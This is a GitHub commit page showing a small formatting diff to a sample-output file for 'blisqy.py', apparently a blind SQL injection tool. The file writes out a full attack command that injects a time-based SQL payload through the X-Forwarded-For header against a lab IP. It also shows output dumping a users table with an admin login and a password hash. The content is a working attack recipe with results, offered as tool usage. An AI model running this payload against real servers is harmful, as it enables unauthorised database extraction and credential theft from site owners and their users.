Skip to content

Commit

Permalink
Update Dig_all_DB_stuff.md
Browse files Browse the repository at this point in the history
  • Loading branch information
John T authored Mar 26, 2017
1 parent 27db275 commit 7dc3bbf
Showing 1 changed file with 4 additions and 3 deletions.
7 changes: 4 additions & 3 deletions Sample-Output/Dig_all_DB_stuff.md
Original file line number Diff line number Diff line change
@@ -1,9 +1,10 @@
##Dig up all teh DB stuff:
## Dig up all teh DB stuff:


### Command
```bash
./blisqy.py --server 192.168.56.101 --port 80 --header "X-Forwarded-For" --hvalue "hacker" --dig yes --sleeptime 0.1 --interactive off --inject "' or if((*sql*),sleep(*time*),0) and '1'='1"
./blisqy.py --server 192.168.56.101 --port 80 --header "X-Forwarded-For" --hvalue "hacker" --dig yes
--sleeptime 0.1 --interactive off --inject "' or if((*sql*),sleep(*time*),0) and '1'='1"
```

### Out-put
Expand Down Expand Up @@ -100,4 +101,4 @@ Preparing to Enumerate Table : users
[+] Getting data from Table : users
[-] id:login:password
[-] 1:admin:8efe310f9ab3efeae8d410a8e0166eb2
```
```

0 comments on commit 7dc3bbf

Please sign in to comment.